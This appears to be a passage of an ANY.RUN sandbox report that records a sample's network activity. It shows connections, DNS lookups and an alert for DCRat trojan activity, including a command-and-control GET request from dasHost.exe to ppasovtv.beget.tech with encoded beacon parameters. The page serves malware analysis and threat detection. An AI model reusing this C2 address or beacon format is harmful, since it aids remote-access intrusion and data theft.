VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeOhXSqxUe3N1TwkERPV3ZE5UavpWSqlzRil2dpl0UatWS2k0UllnUuJWM5ITWpdXaJxWNXFGbOZFTsJ1VMpnUYRGaotWS2kUaiZHbyoFbK5WSzlUejxmSuRWOrczN5syN3QlSp9UarhEZw5UbJNXS51kM0kWT3VkaMBzYU1UdnR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQGOygTMjFWNhJDZkNWMlZmYwIDM1ATM0Y2NmlTO3YWZiwiIjRDNyQGMwYjY0ETOyAjYykjMwcTZmNjNyEjZkJ2N3UWZ3YGM1YjZ0IiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W
unknown
whitelisted
5256
dasHost.exe
GET
200
5.101.153.201:80
http://ppasovtv.beget.tech/L1nc0In.php?xn8=zs4N37VYMTptGw62zT&37IJOxYMzhLoGhvPq=6sCeI18&ZBC44OeGElriqZfuf0AoiLUhPr2l=ZzRLVYWJ4n6KAcKi&598ffaf2ae5671a374e7b5f5bfa3e00a=AN4UjZyQWMjFjMhZDO3I2MhVzNzUjYzADN2kTOiNmN1gjZmJmZwIjZ3QTM5UjN4gDMyITOyIDO&d40967e42e49cc99f8f4737461f68248=gZwQDZzMjY5IGZmFmM2kjMlR2NwQDM2YTO1QWO0E2M0QWZwMTNkNWZ&2b0ec457d6393348e60633ec46b0c081=d1nIxMzYjVWOzIWMjNTM5UmZxUzMzgjNxQWMiVjYjVzMhVmMxkTM1QWYyIiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W&b59bfcc0d57f99bb2fa0b2e32b69c919=QX9JiI6ICZ4IDOxMWY1EmMkR2YxUmZiBjMwUDMxQjZ3YWO5cjZlJCLiEzMjNWZ5MjYxM2MxkTZmFTNzMDO2EDZxIWNiNWNzEWZyETOxUDZhJjI6ISY2EzN5AzY0MjZ4ETYklDZlRzY3QjM1kTMwgDMzUDZmJCLicjM0gzNjdDM1YTMyYjZ0MWZ5QTO3UzMwkDNwIGN4kDO0ATZ0UTZzEmI6ICOjFGMmFzN3gjMhhTM4ETO4MjNyczMzcjNiNzYyUWN2Iyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpVVbkBnUzklQKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWS5ZlMahWNXllTCNlYop0MaZnSIVVavpWSzkzRaVHbyYVVOVVUpdXaJ9kSp9UawcVWqp0VahlTYFWa3lWSapUaPlWVtJmdod0Y2p0MZBXMwMGcKNETptWaiNTOtJmc1clVvFUaiNTOtJmc1clVp9maJxWMXl1TWZUVEp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVhkSDxUa0sWS2kUaiBXMHplQOhVYpdXaJl2bqlESGVkVpdXaJBDbtF1ZRpmTnVlMjBnSINWeWdEZ1ZVRJdXRElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKl3YwpEWZFVOTp1d502YxY1aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaVJTW1ZUbjdkQTx0ZRdlWwp1VhpmVHNmeCNEZ2VzaJZTS5pVe50WSzlUeOhXSqxUe3N1TwkERPV3ZE5UavpWSqlzRil2dpl0UatWS2k0UllnUuJWM5ITWpdXaJxWNXFGbOZFTsJ1VMpnUYRGaotWS2kUaiZHbyoFbK5WSzlUejxmSuRWOrczN5syN3QlSp9UarhEZw5UbJNXS51kM0kWT3VkaMBzYU1UdnR0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQGOygTMjFWNhJDZkNWMlZmYwIDM1ATM0Y2NmlTO3YWZiwiIjRDNyQGMwYjY0ETOyAjYykjMwcTZmNjNyEjZkJ2N3UWZ3YGM1YjZ0IiOiEmNxcTOwMGNzYGOxEGZ5QWZ0M2N0ITN5EDM4AzM1QmZiwiI3IDN4czY3ATN2EjM2YGNjVWO0kzN1MDM5QDMiRDO5gDNwUGN1U2MhJiOigzYhBjZxczN4ITY4EDOxkDOzYjM3MzM3YjYzMmMlVjNis3W
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.110.138:443
Akamai International B.V.
DE
unknown
4536
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4712
MoUsoCoreWorker.exe
23.53.40.178:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4536
svchost.exe
23.53.40.178:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4536
svchost.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
23.52.120.96:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.181.238
whitelisted
crl.microsoft.com
  • 23.53.40.178
  • 23.53.40.176
whitelisted
www.microsoft.com
  • 23.52.120.96
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
ppasovtv.beget.tech
  • 5.101.153.201
whitelisted
self.events.data.microsoft.com
  • 20.44.10.123
whitelisted

Threats

PID
Process
Class
Message
5256
dasHost.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
taskHostw.exe